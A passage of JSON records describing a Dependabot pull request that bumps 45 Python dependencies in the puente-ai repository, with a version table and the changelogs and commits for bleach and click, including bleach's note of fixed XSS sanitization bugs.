yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/puente-platform/puente-ai/pull/90","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/puente-platform%2Fpuente-ai/issues/90","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/90/packages"},{"uuid":"4617726976","node_id":"PR_kwDOP4uxx87kJ4a4","number":190,"state":"open","title":"chore(deps): bump the all-dependencies group across 1 directory with 45 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-09T00:38:36.000Z","updated_at":"2026-06-09T00:39:12.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"all-dependencies","update_count":45,"packages":[{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"bleach","old_version":"6.3.0","new_version":"6.4.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"click","old_version":"8.3.2","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"debugpy","old_version":"1.8.20","new_version":"1.8.21","repository_url":"https://github.com/microsoft/debugpy"},{"name":"decorator","old_version":"5.2.1","new_version":"5.3.1","repository_url":"https://github.com/micheles/decorator"},{"name":"docstring-parser","old_version":"0.17.0","new_version":"0.18.0","repository_url":"https://github.com/rr-/docstring_parser"},{"name":"fastapi","old_version":"0.135.3","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"fonttools","old_version":"4.62.1","new_version":"4.63.0","repository_url":"https://github.com/fonttools/fonttools"},{"name":"httptools","old_version":"0.7.1","new_version":"0.8.0","repository_url":"https://github.com/MagicStack/httptools"},{"name":"idna","old_version":"3.11","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"9.12.0","new_version":"9.14.1","repository_url":"https://github.com/ipython/ipython"},{"name":"jedi","old_version":"0.19.2","new_version":"0.20.0","repository_url":"https://github.com/davidhalter/jedi"},{"name":"jiter","old_version":"0.14.0","new_version":"0.15.0","repository_url":"https://github.com/pydantic/jiter"},{"name":"jupyter-events","old_version":"0.12.0","new_version":"0.12.1","repository_url":"https://github.com/jupyter/jupyter_events"},{"name":"jupyter-client","old_version":"8.8.0","new_version":"8.9.0","repository_url":"https://github.com/jupyter/jupyter_client"},{"name":"jupyter-server","old_version":"2.17.0","new_version":"2.19.0","repository_url":"https://github.com/jupyter-server/jupyter_server"},{"name":"jupyterlab","old_version":"4.5.6","new_version":"4.5.8","repository_url":"https://github.com/jupyterlab/jupyterlab"},{"name":"matplotlib","old_version":"3.10.8","new_version":"3.10.9","repository_url":"https://github.com/matplotlib/matplotlib"},{"name":"matplotlib-inline","old_version":"0.2.1","new_version":"0.2.2","repository_url":"https://github.com/ipython/matplotlib-inline"},{"name":"mistune","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/lepture/mistune"},{"name":"nbclient","old_version":"0.10.4","new_version":"0.11.0","repository_url":"https://github.com/jupyter/nbclient"},{"name":"notebook","old_version":"7.5.5","new_version":"7.5.7","repository_url":"https://github.com/jupyter/notebook"},{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"parso","old_version":"0.8.6","new_version":"0.8.7","repository_url":"https://github.com/davidhalter/parso"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"postgrest","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"praw","old_version":"7.8.1","new_version":"7.8.2","repository_url":"https://github.com/praw-dev/praw"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"pydantic","old_version":"2.13.0","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-core","old_version":"2.46.0","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"realtime","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"scikit-learn","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"soupsieve","old_version":"2.8.3","new_version":"2.8.4","repository_url":"https://github.com/facelessuser/soupsieve"},{"name":"storage3","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase-auth","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase-functions","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"tornado","old_version":"6.5.5","new_version":"6.5.7","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"traitlets","old_version":"5.14.3","new_version":"5.15.1","repository_url":"https://github.com/ipython/traitlets"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"watchfiles","old_version":"1.1.1","new_version":"1.2.0","repository_url":"https://github.com/samuelcolvin/watchfiles"},{"name":"wcwidth","old_version":"0.6.0","new_version":"0.8.1","repository_url":"https://github.com/jquast/wcwidth"}],"path":null,"ecosystem":"pip"},"body":"Bumps the all-dependencies group with 45 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [bleach](https://github.com/mozilla/bleach) | `6.3.0` | `6.4.0` |\n| [click](https://github.com/pallets/click) | `8.3.2` | `8.4.1` |\n| [debugpy](https://github.com/microsoft/debugpy) | `1.8.20` | `1.8.21` |\n| [decorator](https://github.com/micheles/decorator) | `5.2.1` | `5.3.1` |\n| [docstring-parser](https://github.com/rr-/docstring_parser) | `0.17.0` | `0.18.0` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.3` | `0.136.3` |\n| [fonttools](https://github.com/fonttools/fonttools) | `4.62.1` | `4.63.0` |\n| [httptools](https://github.com/MagicStack/httptools) | `0.7.1` | `0.8.0` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.18` |\n| [ipython](https://github.com/ipython/ipython) | `9.12.0` | `9.14.1` |\n| [jedi](https://github.com/davidhalter/jedi) | `0.19.2` | `0.20.0` |\n| [jiter](https://github.com/pydantic/jiter) | `0.14.0` | `0.15.0` |\n| [jupyter-events](https://github.com/jupyter/jupyter_events) | `0.12.0` | `0.12.1` |\n| [jupyter-client](https://github.com/jupyter/jupyter_client) | `8.8.0` | `8.9.0` |\n| [jupyter-server](https://github.com/jupyter-server/jupyter_server) | `2.17.0` | `2.19.0` |\n| [jupyterlab](https://github.com/jupyterlab/jupyterlab) | `4.5.6` | `4.5.8` |\n| [matplotlib](https://github.com/matplotlib/matplotlib) | `3.10.8` | `3.10.9` |\n| [matplotlib-inline](https://github.com/ipython/matplotlib-inline) | `0.2.1` | `0.2.2` |\n| [mistune](https://github.com/lepture/mistune) | `3.2.0` | `3.2.1` |\n| [nbclient](https://github.com/jupyter/nbclient) | `0.10.4` | `0.11.0` |\n| [notebook](https://github.com/jupyter/notebook) | `7.5.5` | `7.5.7` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [parso](https://github.com/davidhalter/parso) | `0.8.6` | `0.8.7` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [postgrest](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [praw](https://github.com/praw-dev/praw) | `7.8.1` | `7.8.2` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.0` | `2.13.4` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.46.0` | `2.47.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [realtime](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.8.0` | `1.9.0` |\n| [soupsieve](https://github.com/facelessuser/soupsieve) | `2.8.3` | `2.8.4` |\n| [storage3](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase-auth](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase-functions](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.5.5` | `6.5.7` |\n| [traitlets](https://github.com/ipython/traitlets) | `5.14.3` | `5.15.1` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [watchfiles](https://github.com/samuelcolvin/watchfiles) | `1.1.1` | `1.2.0` |\n| [wcwidth](https://github.com/jquast/wcwidth) | `0.6.0` | `0.8.1` |\n\n\nUpdates `beautifulsoup4` from 4.14.3 to 4.15.0\n\nUpdates `bleach` from 6.3.0 to 6.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 6.4.0 (June 5th, 2026)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNOTE: 2026-06-05: Bleach is no longer maintained. There will be no future\nreleases including for security issues.\u003c/strong\u003e\nSee issue: \u003ccode\u003e\u0026lt;https://github.com/mozilla/bleach/issues/698\u0026gt;\u003c/code\u003e__\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for pypy 3.10. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/764\"\u003e#764\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix bug 2023812 / GHSA-8rfp-98v4-mmr6.\u003c/p\u003e\n\u003cp\u003eFix XSS issue with sanitize_uri_value where disallowed schemes with\nUnicode invisible characters wouldn't be rejected.\u003c/p\u003e\n\u003cp\u003eFor example::\u003c/p\u003e\n\u003cp\u003eimport bleach\npayload1 = '\u003c!-- raw HTML omitted --\u003eClick\u003c!-- raw HTML omitted --\u003e'\nresult1 = bleach.clean(payload1)\nprint(repr(result1))\u003c/p\u003e\n\u003cp\u003eoutputs::\u003c/p\u003e\n\u003cp\u003e'\u003c!-- raw HTML omitted --\u003eClick\u003c!-- raw HTML omitted --\u003e'\u003c/p\u003e\n\u003cp\u003eSee the advisory for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix GHSA-gj48-438w-jh9v.\u003c/p\u003e\n\u003cp\u003eFix issue where URI sanitization wasn't happening in formaction attributes.\u003c/p\u003e\n\u003cp\u003eSee the advisory for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support for pypy 3.11. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/764\"\u003e#764\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDrop version max in tinycss2 pin. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/772\"\u003e#772\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eThis removes one of the things we had to keep checking and updating. Users\nnow own the responsibility for correctness with the version of tinycss2\nthey're using.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/f0355a7af00500482c5292c6c83290c6a178068d\"\u003e\u003ccode\u003ef0355a7\u003c/code\u003e\u003c/a\u003e fix: fix last release date in CHANGES\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/ae4e8a26706516ad01b92e66321b480208a440da\"\u003e\u003ccode\u003eae4e8a2\u003c/code\u003e\u003c/a\u003e chore: bleach 6.4.0 and final release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/970df58e9f0c55cc52244f3f0106e473a40d886d\"\u003e\u003ccode\u003e970df58\u003c/code\u003e\u003c/a\u003e fix: uri-sanitization in formaction attributes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/7c4867c32344d1c961107fae62240a6f0dc680dc\"\u003e\u003ccode\u003e7c4867c\u003c/code\u003e\u003c/a\u003e fix: xss bypass in allowed protocol test using unicode invisible characters\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/913ab75992b845e2c9c060c41f24d46921db4693\"\u003e\u003ccode\u003e913ab75\u003c/code\u003e\u003c/a\u003e fix: reduce redundancy in workflow jobs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/218c15af455c8dec14f98fcb2e235f8680e93930\"\u003e\u003ccode\u003e218c15a\u003c/code\u003e\u003c/a\u003e fix: rework pip caching\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/4f0b097bf80548a022050e2f71f024d755a9f154\"\u003e\u003ccode\u003e4f0b097\u003c/code\u003e\u003c/a\u003e fix: fix tox platform restrictions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/e95a79d07bb5d792425c2bc0ef5dd03f6614f3bb\"\u003e\u003ccode\u003ee95a79d\u003c/code\u003e\u003c/a\u003e chore: update pytest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/91539d4e80d4685b8f2bedc79076ff0ff6c1b911\"\u003e\u003ccode\u003e91539d4\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 5.0.3 to 5.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd47b4ce495859065da23c2116f651e591e1e90d\"\u003e\u003ccode\u003ecd47b4c\u003c/code\u003e\u003c/a\u003e fix: handle left-angle-bracket that's not a tag (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/733\"\u003e#733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v6.3.0...v6.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.2 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.md\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. {issue}\u003ccode\u003e3458\u003c/code\u003e {pr}\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. {issue}\u003ccode\u003e3277\u003c/code\u003e {pr}\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eEnum\u003c/code\u003e values used as \u003ccode\u003eChoice\u003c/code\u003e options produces a\nvalid completion result. {issue}\u003ccode\u003e3015\u003c/code\u003e {pr}\u003ccode\u003e3471\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. {issue}\u003ccode\u003e3487\u003c/code\u003e {pr}\u003ccode\u003e3493\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. {issue}\u003ccode\u003e3449\u003c/code\u003e {pr}\u003ccode\u003e3482\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eopen_url\u003c/code\u003e on Windows when the file path contains spaces.\n{issue}\u003ccode\u003e2994\u003c/code\u003e {pr}\u003ccode\u003e3478\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e{class}\u003ccode\u003eParamType\u003c/code\u003e typing improvements. {pr}\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e{class}\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e{meth}\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for {class}\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n{class}\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e{meth}\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n{class}\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e{class}\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add {func}\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n{pr}\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e{class}\u003ccode\u003eParameter\u003c/code\u003e typing improvements. {pr}\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e{class}\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e{attr}\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of {meth}\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor {class}\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n{issue}\u003ccode\u003e2745\u003c/code\u003e {pr}\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in 